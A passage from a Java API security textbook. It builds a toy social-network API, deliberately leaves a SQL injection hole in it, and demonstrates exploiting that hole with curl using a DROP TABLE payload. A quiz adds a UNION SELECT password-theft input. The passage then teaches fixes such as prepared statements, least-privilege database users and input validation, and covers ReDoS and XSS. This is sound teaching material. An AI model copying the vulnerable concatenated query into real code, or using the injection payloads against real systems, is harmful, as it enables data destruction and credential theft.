public JSONObject createSpace(Request request, Response response)
throws SQLException {
var json = new JSONObject(request.body());
var spaceName = json.getString("name");
var owner = json.getString("owner");
return database.withTransaction(tx -> {
var spaceId = database.findUniqueLong(
"SELECT NEXT VALUE FOR space_id_seq;");
// WARNING: this next line of code contains a
// security vulnerability!
database.updateUnique(
"INSERT INTO spaces(space_id, name, owner) " +
"VALUES(" + spaceId + ", '" + spaceName +
"', '" + owner + "');");
response.status(201);
response.header("Location", "/spaces/" + spaceId);
return new JSONObject()
.put("name", spaceName)
.put("uri", "/spaces/" + spaceId);
});
}
}
2.3
Wiring up the REST endpoints
Now that you’ve created the controller, you need to wire it up so that it will be called
when a user makes a HTTP request to create a space. To do this, you’ll need to create
a new Spark route that describes how to match incoming HTTP requests to methods in
our controller objects.
DEFINITION
A route defines how to convert a HTTP request into a method call
for one of your controller objects. For example, a HTTP POST method to the
/spaces URI may result in a createSpace method being called on the Space-
Controller object.
Listing 2.4
Creating a new social space
Parse the request payload and
extract details from the JSON.
Start a database
transaction.
Generate a fresh ID
for the social space.
Return a 201
Created status
code with the URI
of the space in the
Location header.
37
Wiring up the REST endpoints
In listing 2.5, you’ll use static imports to access the Spark API. This is not strictly neces-
sary, but it’s recommended by the Spark developers because it can make the code
more readable. Then you need to create an instance of your SpaceController object
that you created in the last section, passing in the Dalesbred Database object so that it
can access the database. You can then configure Spark routes to call methods on the
controller object in response to HTTP requests. For example, the following line of
code arranges for the createSpace method to be called when a HTTP POST request is
received for the /spaces URI:
post("/spaces", spaceController::createSpace);
Finally, because all your API responses will be JSON, we add a Spark after filter to set
the Content-Type header on the response to application/json in all cases, which is
the correct content type for JSON. As we shall see later, it is important to set correct
type headers on all responses to ensure that data is processed as intended by the cli-
ent. We also add some error handlers to produce correct JSON responses for internal
server errors and not found errors (when a user requests a URI that does not have a
defined route).
TIP
Spark has three types of filters (figure 2.4). Before-filters run before the
request is handled and are useful for validation and setting defaults. After-
filters run after the request has been handled, but before any exception
handlers (if processing the request threw an exception). There are also
afterAfter-filters, which run after all other processing, including exception
handlers, and so are useful for setting headers that you want to have present
on all responses.
Request
handler
Before-
filters
Request
After-filters
afterAfter-
filters
Exception
response
Exception
handler
Normal
response
Figure 2.4
Spark before-filters run before the request is processed by your
request handler. If the handler completes normally, then Spark will run any
after-filters. If the handler throws an exception, then Spark runs the matching
exception handler instead of the after-filters. Finally, afterAfter-filters are
always run after every request has been processed.
38
CHAPTER 2
Secure API development
Locate the Main.java file in the project and open it in your text editor. Type in the
code from listing 2.5 and save the new file.
package com.manning.apisecurityinaction;
import com.manning.apisecurityinaction.controller.*;
import org.dalesbred.Database;
import org.h2.jdbcx.JdbcConnectionPool;
import org.json.*;
import java.nio.file.*;
import static spark.Spark.*;
public class Main {
public static void main(String... args) throws Exception {
var datasource = JdbcConnectionPool.create(
"jdbc:h2:mem:natter", "natter", "password");
var database = Database.forDataSource(datasource);
createTables(database);
var spaceController =
new SpaceController(database);
post("/spaces",
spaceController::createSpace);
after((request, response) -> {
response.type("application/json");
});
internalServerError(new JSONObject()
.put("error", "internal server error").toString());
notFound(new JSONObject()
.put("error", "not found").toString());
}
private static void createTables(Database database) {
// As before
}
}
2.3.1
Trying it out
Now that we have one API operation written, we can start up the server and try it out.
The simplest way to get up and running is by opening a terminal in the project folder
and using Maven:
mvn clean compile exec:java
Listing 2.5
The Natter REST API endpoints
Use static imports to
use the Spark API.
Construct the SpaceController
and pass it the Database
object.
This handles POST requests
to the /spaces endpoint by
calling the createSpace
method on your controller
object.
We add some
basic filters
to ensure all
output is
always
treated as
JSON.
39
Injection attacks
You should see log output to indicate that Spark has started an embedded Jetty server on
port 4567. You can then use curl to call your API operation, as in the following example:
$ curl -i -d '{"name": "test space", "owner": "demo"}'
➥ http://localhost:4567/spaces
HTTP/1.1 201 Created
Date: Wed, 30 Jan 2019 15:13:19 GMT
Location: /spaces/4
Content-Type: application/json
Transfer-Encoding: chunked
Server: Jetty(9.4.8.v20171121)
{"name":"test space","uri":"/spaces/1"}
TRY IT
Try creating some different spaces with different names and owners,
or with the same name. What happens when you send unusual inputs, such as
an owner username longer than 30 characters? What about names that con-
tain special characters such as single quotes?
2.4
Injection attacks
Unfortunately, the code you’ve just written has a serious security vulnerability, known
as a SQL injection attack. Injection attacks are one of the most widespread and most
serious vulnerabilities in any software application. Injection is currently the number
one entry in the OWASP Top 10 (see sidebar).
The OWASP Top 10
The OWASP Top 10 is a listing of the top 10 vulnerabilities found in many web applica-
tions and is considered the authoritative baseline for a secure web application. Pro-
duced by the Open Web Application Security Project (OWASP) every few years, the latest
edition was published in 2017 and is available from https://owasp.org/www-project-
top-ten/. The Top 10 is collated from feedback from security professionals and a sur-
vey of reported vulnerabilities. While this book was being written they also published
a specific API security top 10 (https://owasp.org/www-project-api-security/). The cur-
rent versions list the following vulnerabilities, most of which are covered in this book:
Web application top 10
API security top 10
A1:2017 - Injection
API1:2019 - Broken Object Level Authorization
A2:2017 - Broken Authentication
API2:2019 - Broken User Authentication
A3:2017 - Sensitive Data Exposure
API3:2019 - Excessive Data Exposure
A4:2017 - XML External Entities (XXE)
API4:2019 - Lack of Resources & Rate Limiting
A5:2017 - Broken Access Control
API5:2019 - Broken Function Level Authorization
A6:2017 - Security Misconfiguration
API6:2019 - Mass Assignment
A7:2017 - Cross-Site Scripting (XSS)
API7:2019 - Security Misconfiguration
40
CHAPTER 2
Secure API development
An injection attack can occur anywhere that you execute dynamic code in response
to user input, such as SQL and LDAP queries, and when running operating system
commands.
DEFINITION
An injection attack occurs when unvalidated user input is included
directly in a dynamic command or query that is executed by the application,
allowing an attacker to control the code that is executed.
If you implement your API in a dynamic language, your language may have a built-in
eval() function to evaluate a string as code, and passing unvalidated user input into
such a function would be a very dangerous thing to do, because it may allow the user
to execute arbitrary code with the full permissions of your application. But there are
many cases in which you are evaluating code that may not be as obvious as calling an
explicit eval function, such as:
Building an SQL command or query to send to a database
Running an operating system command
Performing a lookup in an LDAP directory
Sending an HTTP request to another API
Generating an HTML page to send to a web browser
If user input is included in any of these cases in an uncontrolled way, the user may be
able to influence the command or query to have unintended effects. This type of vul-
nerability is known as an injection attack and is often qualified with the type of code
being injected: SQL injection (or SQLi), LDAP injection, and so on.
The Natter createSpace operation is vulnerable to a SQL injection attack because
it constructs the command to create the new social space by concatenating user input
directly into a string. The result is then sent to the database where it will be interpreted
(continued)
It’s important to note that although every vulnerability in the Top 10 is worth learning
about, avoiding the Top 10 will not by itself make your application secure. There is
no simple checklist of vulnerabilities to avoid. Instead, this book will teach you the
general principles to avoid entire classes of vulnerabilities.
Web application top 10
API security top 10
A8:2017 - Insecure Deserialization
API8:2019 - Injection
A9:2017 - Using Components with Known
Vulnerabilities
API9:2019 - Improper Assets Management
A10:2017 - Insufficient Logging & Monitoring
API10:2019 - Insufficient Logging & Monitoring
41
Injection attacks
as a SQL command. Because the syntax of the SQL command is a string and the user
input is a string, the database has no way to tell the difference.
This confusion is what allows an attacker to gain control. The offending line from
the code is the following, which concatenates the user-supplied space name and owner
into the SQL INSERT statement:
database.updateUnique(
"INSERT INTO spaces(space_id, name, owner) " +
"VALUES(" + spaceId + ", '" + spaceName +
"', '" + owner + "');");
The spaceId is a numeric value that is created by your application from a sequence, so
that is relatively safe, but the other two variables come directly from the user. In this
case, the input comes from the JSON payload, but it could equally come from query
parameters in the URL itself. All types of requests are potentially vulnerable to injec-
tion attacks, not just POST methods that include a payload.
In SQL, string values are surrounded by single quotes and you can see that the
code takes care to add these around the user input. But what happens if that user
input itself contains a single quote? Let’s try it and see:
$ curl -i -d "{\"name\": \"test'space\", \"owner\": \"demo\"}"
➥ http://localhost:4567/spaces
HTTP/1.1 500 Server Error
Date: Wed, 30 Jan 2019 16:39:04 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Server: Jetty(9.4.8.v20171121)
{"error":"internal server error"}
You get one of those terrible 500 internal server error responses. If you look at the
server logs, you can see why:
org.h2.jdbc.JdbcSQLException: Syntax error in SQL statement "INSERT INTO
spaces(space_id, name, owner) VALUES(4, 'test'space', 'demo[*]');";
Header and log injection
There are examples of injection vulnerabilities that do not involve code being exe-
cuted at all. For example, HTTP headers are lines of text separated by carriage return
and new line characters ("\r\n" in Java). If you include unvalidated user input in a
HTTP header then an attacker may be able to add a "\r\n" character sequence and
then inject their own HTTP headers into the response. The same can happen when
you include user-controlled data in debug or audit log messages (see chapter 3),
allowing an attacker to inject fake log messages into the log file to confuse somebody
later attempting to investigate an attack.
42
CHAPTER 2
Secure API development
The single quote you included in your input has ended up causing a syntax error in
the SQL expression. What the database sees is the string 'test', followed by some
extra characters (“space”) and then another single quote. Because this is not valid
SQL syntax, it complains and aborts the transaction. But what if your input ends up
being valid SQL? In that case the database will execute it without complaint. Let’s try
running the following command instead:
$ curl -i -d "{\"name\": \"test\",\"owner\":
➥ \"'); DROP TABLE spaces; --\"}" http://localhost:4567/spaces
HTTP/1.1 201 Created
Date: Wed, 30 Jan 2019 16:51:06 GMT
Location: /spaces/9
Content-Type: application/json
Transfer-Encoding: chunked
Server: Jetty(9.4.8.v20171121)
{"name":"', ''); DROP TABLE spaces; --","uri":"/spaces/9"}
The operation completed successfully with no errors, but let’s see what happens when
you try to create another space:
$ curl -d '{"name": "test space", "owner": "demo"}'
➥ http://localhost:4567/spaces
{"error":"internal server error"}
If you look in the logs again, you find the following:
org.h2.jdbc.JdbcSQLException: Table "SPACES" not found;
Oh dear. It seems that by passing in carefully crafted input your user has managed to
delete the spaces table entirely, and your whole social network with it! Figure 2.5
shows what the database saw when you executed the first curl command with the
funny owner name. Because the user input values are concatenated into the SQL as
strings, the database ends up seeing a single string that appears to contain two different
statements: the INSERT statement we intended, and a DROP TABLE statement that the
INSERT INTO spaces(space_id, name, owner) VALUES(
, ‘
‘, ‘
‘);
12
test
‘); DROP TABLE spaces; --
spaceId
name
owner
INSERT INTO spaces(space_id, name, owner) VALUES(12, ‘test’, ‘’); DROP TABLE spaces; -- ‘);
Becomes
Figure 2.5
A SQL injection attack occurs when user input is mixed into a SQL statement without
the database being able to tell them apart. To the database, this SQL command with a funny
owner name ends up looking like two separate statements followed by a comment.
43
Injection attacks
attacker has managed to inject. The first character of the owner name is a single quote
character, which closes the open quote inserted by our code. The next two characters
are a close parenthesis and a semicolon, which together ensure that the INSERT state-
ment is properly terminated. The DROP TABLE statement is then inserted (injected)
after the INSERT statement. Finally, the attacker adds another semicolon and two
hyphen characters, which starts a comment in SQL. This ensures that the final close
quote and parenthesis inserted by the code are ignored by the database and do not
cause a syntax error.
When these elements are put together, the result is that the database sees two valid
SQL statements: one that inserts a dummy row into the spaces table, and then another
that destroys that table completely. Figure 2.6 is a famous cartoon from the XKCD web
comic that illustrates the real-world problems that SQL injection can cause.
2.4.1
Preventing injection attacks
There are a few techniques that you can use to prevent injection attacks. You could try
escaping any special characters in the input to prevent them having an effect. In this
case, for example, perhaps you could escape or remove the single-quote characters.
This approach is often ineffective because different databases treat different charac-
ters specially and use different approaches to escape them. Even worse, the set of spe-
cial characters can change from release to release, so what is safe at one point in time
might not be so safe after an upgrade.
A better approach is to strictly validate all inputs to ensure that they only contain
characters that you know to be safe. This is a good idea, but it’s not always possible to
eliminate all invalid characters. For example, when inserting names, you can’t avoid
single quotes, otherwise you might forbid genuine names such as Mary O’Neill.
The best approach is to ensure that user input is always clearly separated from
dynamic code by using APIs that support prepared statements. A prepared statement
allows you to write the command or query that you want to execute with placeholders
Figure 2.6
The consequences of failing to handle SQL injection attacks. (Credit: XKCD, “Exploits of a Mom,”
https://www.xkcd.com/327/.)
44
CHAPTER 2
Secure API development
in it for user input, as shown in figure 2.7. You then separately pass the user input val-
ues and the database API ensures they are never treated as statements to be executed.
DEFINITION
A prepared statement is a SQL statement with all user input replaced
with placeholders. When the statement is executed the input values are sup-
plied separately, ensuring the database can never be tricked into executing
user input as code.
Listing 2.6 shows the createSpace code updated to use a prepared statement. Dales-
bred has built-in support for prepared statements by simply writing the statement with
placeholder values and then including the user input as extra arguments to the update-
Unique method call. Open the SpaceController.java file in your text editor and find
the createSpace method. Update the code to match the code in listing 2.6, using a
prepared statement rather than manually concatenating strings together. Save the file
once you are happy with the new code.
public JSONObject createSpace(Request request, Response response)
throws SQLException {
var json = new JSONObject(request.body());
var spaceName = json.getString("name");
var owner = json.getString("owner");
return database.withTransaction(tx -> {
var spaceId = database.findUniqueLong(
"SELECT NEXT VALUE FOR space_id_seq;");
Listing 2.6
Using prepared statements
INSERT INTO spaces(space_id, name, owner) VALUES(?, ?, ?);
test
12
‘); DROP TABLE spaces; --
Prepared statement
with placeholder values
Actual parameter values
are always kept separate
1
2
3
Placeholders
Figure 2.7
A prepared statement ensures that user input values are
always kept separate from the SQL statement itself. The SQL statement
only contains placeholders (represented as question marks) and is parsed
and compiled in this form. The actual parameter values are passed to the
database separately, so it can never be confused into treating user input
as SQL code to be executed.
45
Injection attacks
database.updateUnique(
"INSERT INTO spaces(space_id, name, owner) " +
"VALUES(?, ?, ?);", spaceId, spaceName, owner);
response.status(201);
response.header("Location", "/spaces/" + spaceId);
return new JSONObject()
.put("name", spaceName)
.put("uri", "/spaces/" + spaceId);
});
Now when your statement is executed, the database will be sent the user input sepa-
rately from the query, making it impossible for user input to influence the commands
that get executed. Let’s see what happens when you run your malicious API call. This
time the space gets created correctly—albeit with a funny name!
$ curl -i -d "{\"name\": \"', ''); DROP TABLE spaces; --\",
➥ \"owner\": \"\"}" http://localhost:4567/spaces
HTTP/1.1 201 Created
Date: Wed, 30 Jan 2019 16:51:06 GMT
Location: /spaces/10
Content-Type: application/json
Transfer-Encoding: chunked
Server: Jetty(9.4.8.v20171121)
{"name":"', ''); DROP TABLE spaces; --","uri":"/spaces/10"}
Prepared statements in SQL eliminate the possibility of SQL injection attacks if used
consistently. They also can have a performance advantage because the database can
compile the query or statement once and then reuse the compiled code for many dif-
ferent inputs; there is no excuse not to use them. If you’re using an object-relational
mapper (ORM) or other abstraction layer over raw SQL commands, check the docu-
mentation to make sure that it’s using prepared statements under the hood. If you’re
using a non-SQL database, check to see whether the database API supports parameter-
ized calls that you can use to avoid building commands through string concatenation.
2.4.2
Mitigating SQL injection with permissions
While prepared statements should be your number one defense against SQL injection
attacks, another aspect of the attack worth mentioning is that the database user didn’t
need to have permissions to delete tables in the first place. This is not an operation
that you would ever require your API to be able to perform, so we should not have
granted it the ability to do so in the first place. In the H2 database you are using, and
in most databases, the user that creates a database schema inherits full permissions to
alter the tables and other objects in that database. The principle of least authority says
that you should only grant users and processes the fewest permissions that they need
to get their job done and no more. Your API does not ever need to drop database
tables, so you should not grant it the ability to do so. Changing the permissions will
Use placeholders
in the SQL
statement and
pass the values as
additional
arguments.
46
CHAPTER 2
Secure API development
not prevent SQL injection attacks, but it means that if an SQL injection attack is ever
found, then the consequences will be contained to only those actions you have explic-
itly allowed.
PRINCIPLE
The principle of least authority (POLA), also known as the principle of
least privilege, says that all users and processes in a system should be given only
those permissions that they need to do their job—no more, and no less.
To reduce the permissions that your API runs with, you could try and remove permis-
sions that you do not need (using the SQL REVOKE command). This runs the risk that
you might accidentally forget to revoke some powerful permissions. A safer alternative
is to create a new user and only grant it exactly the permissions that it needs. To do
this, we can use the SQL standard CREATE USER and GRANT commands, as shown in list-
ing 2.7. Open the schema.sql file that you created earlier in your text editor and add
the commands shown in the listing to the bottom of the file. The listing first creates a
new database user and then grants it just the ability to perform SELECT and INSERT
statements on our two database tables.
CREATE USER natter_api_user PASSWORD 'password';
GRANT SELECT, INSERT ON spaces, messages TO natter_api_user;
We then need to update our Main class to switch to using this restricted user after the
database schema has been loaded. Note that we cannot do this before the database
schema is loaded, otherwise we would not have enough permissions to create the data-
base! We can do this by simply reloading the JDBC DataSource object after we have
created the schema, switching to the new user in the process. Locate and open the
Main.java file in your editor again and navigate to the start of the main method where
you initialize the database. Change the few lines that create and initialize the database
to the following lines instead:
var datasource = JdbcConnectionPool.create(
"jdbc:h2:mem:natter", "natter", "password");
var database = Database.forDataSource(datasource);
createTables(database);
datasource = JdbcConnectionPool.create(
"jdbc:h2:mem:natter", "natter_api_user", "password");
database = Database.forDataSource(datasource);
Here you create and initialize the database using the “natter” user as before, but you
then recreate the JDBC connection pool DataSource passing in the username and
password of your newly created user. In a real project, you should be using more
secure passwords than password, and you’ll see how to inject more secure connection
passwords in chapter 10.
Listing 2.7
Creating a restricted database user
Create the new
database user.
Grant just the
permissions it needs.
Initialize the
database schema as
the privileged user.
Switch to the natter_
api_user and recreate
the database objects.
47
Input validation
If you want to see the difference this makes, you can temporarily revert the
changes you made previously to use prepared statements. If you then try to carry out
the SQL injection attack as before, you will see a 500 error. But this time when you
check the logs, you will see that the attack was not successful because the DROP TABLE
command was denied due to insufficient permissions:
Caused by: org.h2.jdbc.JdbcSQLException: Not enough rights for object
"PUBLIC.SPACES"; SQL statement:
DROP TABLE spaces; --'); [90096-197]
2.5
Input validation
Security flaws often occur when an attacker can submit inputs that violate your
assumptions about how the code should operate. For example, you might assume that
an input can never be more than a certain size. If you’re using a language like C or
Pop quiz
1
Which one of the following is not in the 2017 OWASP Top 10?
a
Injection
b
Broken Access Control
c
Security Misconfiguration
d
Cross-Site Scripting (XSS)
e
Cross-Site Request Forgery (CSRF)
f
Using Components with Known Vulnerabilities
2
Given the following insecure SQL query string:
String query =
"SELECT msg_text FROM messages WHERE author = '"
+ author + "'"
and the following author input value supplied by an attacker:
john' UNION SELECT password FROM users; --
what will be the output of running the query (assuming that the users table exists
with a password column)?
a
Nothing
b
A syntax error
c
John’s password
d
The passwords of all users
e
An integrity constraint error
f
The messages written by John
g
Any messages written by John and the passwords of all users
The answers are at the end of the chapter.
48
CHAPTER 2
Secure API development
C++ that lacks memory safety, then failing to check this assumption can lead to a seri-
ous class of attacks known as buffer overflow attacks. Even in a memory-safe language,
failing to check that the inputs to an API match the developer’s assumptions can
result in unwanted behavior.
DEFINITION
A buffer overflow or buffer overrun occurs when an attacker can sup-
ply input that exceeds the size of the memory region allocated to hold that
input. If the program, or the language runtime, fails to check this case then
the attacker may be able to overwrite adjacent memory.
A buffer overflow might seem harmless enough; it just corrupts some memory, so
maybe we get an invalid value in a variable, right? However, the memory that is over-
written may not always be simple data and, in some cases, that memory may be inter-
preted as code, resulting in a remote code execution vulnerability. Such vulnerabilities are
extremely serious, as the attacker can usually then run code in your process with the
full permissions of your legitimate code.
DEFINITION
Remote code execution (RCE) occurs when an attacker can inject
code into a remotely running API and cause it to execute. This can allow the
attacker to perform actions that would not normally be allowed.
In the Natter API code, the input to the API call is presented as structured JSON. As
Java is a memory-safe language, you don’t need to worry too much about buffer over-
flow attacks. You’re also using a well-tested and mature JSON library to parse the
input, which eliminates a lot of problems that can occur. You should always use well-
established formats and libraries for processing all input to your API where possible.
JSON is much better than the complex XML formats it replaced, but there are still
often significant differences in how different libraries parse the same JSON.
LEARN MORE
Input parsing is a very common source of security vulnerabilities,
and many widely used input formats are poorly specified, resulting in differ-
ences in how they are parsed by different libraries. The LANGSEC movement
(http://langsec.org) argues for the use of simple and unambiguous input for-
mats and automatically generated parsers to avoid these issues.
Insecure deserialization
Although Java is a memory-safe language and so less prone to buffer overflow
attacks, that does not mean it is immune from RCE attacks. Some serialization librar-
ies that convert arbitrary Java objects to and from string or binary formats have turned
out to be vulnerable to RCE attacks, known as an insecure deserialization vulnerability
in the OWASP Top 10. This affects Java’s built-in Serializable framework, but also
parsers for supposedly safe formats like JSON have been vulnerable, such as the
popular Jackson Databind.a The problem occurs because Java will execute code
within the default constructor of any object being deserialized by these frameworks.
49
Input validation
Although the API is using a safe JSON parser, it’s still trusting the input in other
regards. For example, it doesn’t check whether the supplied username is less than the
30-character maximum configured in the database schema. What happens you pass in
a longer username?
$ curl -d '{"name":"test", "owner":"a really long username
➥ that is more than 30 characters long"}'
➥ http://localhost:4567/spaces -i
HTTP/1.1 500 Server Error
Date: Fri, 01 Feb 2019 13:28:22 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Server: Jetty(9.4.8.v20171121)
{"error":"internal server error"}
If you look in the server logs, you see that the database constraint caught the problem:
Value too long for column "OWNER VARCHAR(30) NOT NULL"
But you shouldn’t rely on the database to catch all errors. A database is a valuable asset
that your API should be protecting from invalid requests. Sending requests to the
database that contain basic errors just ties up resources that you would rather use pro-
cessing genuine requests. Furthermore, there may be additional constraints that are
harder to express in a database schema. For example, you might require that the user
exists in the corporate LDAP directory. In listing 2.8, you’ll add some basic input vali-
dation to ensure that usernames are at most 30 characters long, and space names up
Some classes included with popular Java libraries perform dangerous operations in
their constructors, including reading and writing files and performing other actions.
Some classes can even be used to load and execute attacker-supplied bytecode
directly. Attackers can exploit this behavior by sending a carefully crafted message
that causes the vulnerable class to be loaded and executed.
The solution to these problems is to allowlist a known set of safe classes and refuse
to deserialize any other class. Avoid frameworks that do not allow you to control which
classes are deserialized. Consult the OWASP Deserialization Cheat Sheet for advice
on avoid insecure deserialization vulnerabilities in several programming languages:
https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html.
You should take extra care when using a complex input format such as XML, because
there are several specific attacks against such formats. OWASP maintains cheat
sheets for secure processing of XML and other attacks, which you can find linked
from the deserialization cheat sheet.
a
See https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/ for a
description of the vulnerability. The vulnerability relies on a feature of Jackson that is dis-
abled by default.
50
CHAPTER 2
Secure API development
to 255 characters. You’ll also ensure that usernames contain only alphanumeric char-
acters, using a regular expression.
PRINCIPLE
Always define acceptable inputs rather than unacceptable ones when val-
idating untrusted input. An allow list describes exactly which inputs are con-
sidered valid and rejects anything else.1 A blocklist (or deny list), on the other
hand, tries to describe which inputs are invalid and accepts anything else.
Blocklists can lead to security flaws if you fail to anticipate every possible mali-
cious input. Where the range of inputs may be large and complex, such as
Unicode text, consider listing general classes of acceptable inputs like “deci-
mal digit” rather than individual input values.
Open the SpaceController.java file in your editor and find the createSpace method
again. After each variable is extracted from the input JSON, you will add some basic
validation. First, you’ll ensure that the spaceName is shorter than 255 characters, and
then you’ll validate the owner username matches the following regular expression:
[a-zA-Z][a-zA-Z0-9]{1,29}
That is, an uppercase or lowercase letter followed by between 1 and 29 letters or dig-
its. This is a safe basic alphabet for usernames, but you may need to be more flexible if
you need to support international usernames or email addresses as usernames.
public String createSpace(Request request, Response response)
throws SQLException {
var json = new JSONObject(request.body());
var spaceName = json.getString("name");
if (spaceName.length() > 255) {
throw new IllegalArgumentException("space name too long");
}
var owner = json.getString("owner");
if (!owner.matches("[a-zA-Z][a-zA-Z0-9]{1,29}")) {
throw new IllegalArgumentException("invalid username: " + owner);
}
..
}
Regular expressions are a useful tool for input validation, because they can succinctly
express complex constraints on the input. In this case, the regular expression ensures
that the username consists only of alphanumeric characters, doesn’t start with a num-
ber, and is between 2 and 30 characters in length. Although powerful, regular expres-
sions can themselves be a source of attack. Some regular expression implementations
can be made to consume large amounts of CPU time when processing certain inputs,
1 You may hear the older terms whitelist and blacklist used for these concepts, but these words can have negative
connotations and should be avoided. See https://www.ncsc.gov.uk/blog-post/terminology-its-not-black-and-
white for a discussion.
Listing 2.8
Validating inputs
Check that the space
name is not too long.
Here we use a regular expression to
ensure the username is valid.
51
Input validation
leading to an attack known as a regular expression denial of service (ReDoS) attack (see
sidebar).
If you compile and run this new version of the API, you’ll find that you still get a 500
error, but at least you are not sending invalid requests to the database anymore. To
communicate a more descriptive error back to the user, you can install a Spark excep-
tion handler in your Main class, as shown in listing 2.9. Go back to the Main.java file in
your editor and navigate to the end of the main method. Spark exception handlers
are registered by calling the Spark.exception() method, which we have already stati-
cally imported. The method takes two arguments: the exception class to handle, and
then a handler function that will take the exception, the request, and the response
objects. The handler function can then use the response object to produce an appropri-
ate error message. In this case, you will catch IllegalArgumentException thrown by
our validation code, and JSONException thrown by the JSON parser when given incor-
rect input. In both cases, you can use a helper method to return a formatted 400 Bad
Request error to the user. You can also return a 404 Not Found result when a user tries
to access a space that doesn’t exist by catching Dalesbred’s EmptyResultException.
import org.dalesbred.result.EmptyResultException;
import spark.*;
public class Main {
ReDoS Attacks
A regular expression denial of service (or ReDoS) attack occurs when a regular expres-
sion can be forced to take a very long time to match a carefully chosen input string.
This can happen if the regular expression implementation can be forced to back-track
many times to consider different possible ways the expression might match.
As an example, the regular expression ^(a|aa)+$ can match a long string of a char-
acters using a repetition of either of the two branches. Given the input string
“aaaaaaaaaaaaab” it might first try matching a long sequence of single a characters,
then when that fails (when it sees the b at the end) it will try matching a sequence of
single a characters followed by a double-a (aa) sequence, then two double-a
sequences, then three, and so on. After it has tried all those it might try interleaving
single-a and double-a sequences, and so on. There are a lot of ways to match this
input, and so the pattern matcher may take a very long time before it gives up. Some
regular expression implementations are smart enough to avoid these problems, but
many popular programming languages (including Java) are not.a Design your regular
expressions so that there is always only a single way to match any input. In any
repeated part of the pattern, each input string should only match one of the alterna-
tives. If you’re not sure, prefer using simpler string operations instead.
a
Java 11 appears to be less susceptible to these attacks than earlier versions.
Listing 2.9
Handling exceptions
Add required
imports.
52
CHAPTER 2
Secure API development
public static void main(String... args) throws Exception {
..
exception(IllegalArgumentException.class,
Main::badRequest);
exception(JSONException.class,
Main::badRequest);
exception(EmptyResultException.class,
(e, request, response) -> response.status(404));
}
private static void badRequest(Exception ex,
Request request, Response response) {
response.status(400);
response.body("{\"error\": \"" + ex + "\"}");
}
..
}
Now the user gets an appropriate error if they supply invalid input:
$ curl -d '{"name":"test", "owner":"a really long username
➥ that is more than 30 characters long"}'
➥ http://localhost:4567/spaces -i
HTTP/1.1 400 Bad Request
Date: Fri, 01 Feb 2019 15:21:16 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Server: Jetty(9.4.8.v20171121)
{"error": "java.lang.IllegalArgumentException: invalid username: a really
long username that is more than 30 characters long"}
Pop quiz
3
Given the following code for processing binary data received from a user (as a
java.nio.ByteBuffer):
int msgLen = buf.getInt();
byte[] msg = new byte[msgLen];
buf.get(msg);
and recalling from the start of section 2.5 that Java is a memory-safe language,
what is the main vulnerability an attacker could exploit in this code?
a
Passing a negative message length
b
Passing a very large message length
c
Passing an invalid value for the message length
d
Passing a message length that is longer than the buffer size
e
Passing a message length that is shorter than the buffer size
The answer is at the end of the chapter.
Install an exception
handler to signal invalid
inputs to the caller as
HTTP 400 errors.
Also handle
exceptions
from the
JSON parser.
Return 404
Not Found for
Dalesbred empty
result exceptions.
53
Producing safe output
2.6
Producing safe output
In addition to validating all inputs, an API should also take care to ensure that the out-
puts it produces are well-formed and cannot be abused. Unfortunately, the code
you’ve written so far does not take care of these details. Let’s have a look again at the
output you just produced:
HTTP/1.1 400 Bad Request
Date: Fri, 01 Feb 2019 15:21:16 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Server: Jetty(9.4.8.v20171121)
{"error": "java.lang.IllegalArgumentException: invalid username: a really
long username that is more than 30 characters long"}
There are three separate problems with this output as it stands:
1
It includes details of the exact Java exception that was thrown. Although not a
vulnerability by itself, these kinds of details in outputs help a potential attacker
to learn what technologies are being used to power an API. The headers are
also leaking the version of the Jetty webserver that is being used by Spark under
the hood. With these details the attacker can try and find known vulnerabilities
to exploit. Of course, if there are vulnerabilities then they may find them any-
way, but you’ve made their job a lot easier by giving away these details. Default
error pages often leak not just class names, but full stack traces and other
debugging information.
2
It echoes back the erroneous input that the user supplied in the response and
doesn’t do a good job of escaping it. When the API client might be a web
browser, this can result in a vulnerability known as reflected cross-site scripting
(XSS). You’ll see how an attacker can exploit this in section 2.6.1.
3
The Content-Type header in the response is set to text/html rather than the
expected application/json. Combined with the previous issue, this increases
the chance that an XSS attack could be pulled off against a web browser client.
You can fix the information leaks in point 1 by simply removing these fields from the
response. In Spark, it’s unfortunately rather difficult to remove the Server header com-
pletely, but you can set it to an empty string in a filter to remove the information leak:
afterAfter((request, response) ->
response.header("Server", ""));
You can remove the leak of the exception class details by changing the exception han-
dler to only return the error message not the full class. Change the badRequest
method you added earlier to only return the detail message from the exception.
private static void badRequest(Exception ex,
Request request, Response response) {
54
CHAPTER 2
Secure API development
response.status(400);
response.body("{\"error\": \"" + ex.getMessage() + "\"}");
}
2.6.1
Exploiting XSS Attacks
To understand the XSS attack, let’s try to exploit it. Before you can do so, you may
need to add a special header to your response to turn off built-in protections in some
browsers that will detect and prevent reflected XSS attacks. This protection used to be
widely implemented in browsers but has recently been removed from Chrome and
Microsoft Edge.2 If you’re using a browser that still implements it, this protection
makes it harder to pull off this specific attack, so you’ll disable it by adding the follow-
ing header filter to your Main class (an afterAfter filter in Spark runs after all other
Cross-Site Scripting
Cross-site scripting, or XSS, is a common vulnerability affecting web applications, in
which an attacker can cause a script to execute in the context of another site. In a
persistent XSS, the script is stored in data on the server and then executed whenever
a user accesses that data through the web application. A reflected XSS occurs when
a maliciously crafted input to a request causes the script to be included (reflected)
in the response to that request. Reflected XSS is slightly harder to exploit because a
victim has to be tricked into visiting a website under the attacker’s control to trigger
the attack. A third type of XSS, known as DOM-based XSS, attacks JavaScript code
that dynamically creates HTML in the browser.
These can be devastating to the security of a web application, allowing an attacker
to potentially steal session cookies and other credentials, and to read and alter data
in that session. To appreciate why XSS is such a risk, you need to understand that
the security model of web browsers is based on the same-origin policy (SOP). Scripts
executing within the same origin (or same site) as a web page are, by default, able
to read cookies set by that website, examine HTML elements created by that site,
make network requests to that site, and so on, although scripts from other origins
are blocked from doing those things. A successful XSS allows an attacker to execute
their script as if it came from the target origin, so the malicious script gets to do all
the same things that the genuine scripts from that origin can do. If I can successfully
exploit an XSS vulnerability on facebook.com, for example, my script could potentially
read and alter your Facebook posts or steal your private messages.
Although XSS is primarily a vulnerability in web applications, in the age of single-page
